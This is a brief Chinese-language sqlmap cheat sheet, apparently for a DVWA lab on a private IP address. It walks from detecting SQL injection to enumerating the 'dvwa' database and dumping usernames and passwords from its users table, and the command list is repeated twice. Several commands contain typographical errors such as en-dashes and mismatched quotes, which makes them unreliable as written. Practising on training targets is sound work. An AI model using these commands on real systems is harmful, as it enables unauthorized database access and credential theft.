Sqlmap命令注入MySQL数据库
查看是否存在SQL注入
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" --cookie='security=low'
探测数据库名称
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" --dbs
查询数据库中的表名
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134”-D dvwa --tables
获得表中的字段
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134”-D dvwa -T users --columns
获得字段内容
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134”-D dvwa -T users -columns --dump
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" –D dvwa –T users –C "username, password" --dump
查看是否存在SQL注入
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" --cookie='security=low'
探测数据库名称
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" --dbs
查询数据库中的表名
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134”-D dvwa --tables
获得表中的字段
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134”-D dvwa -T users --columns
获得字段内容
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134”-D dvwa -T users -columns --dump
python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" –D dvwa –T users –C "username, password" --dump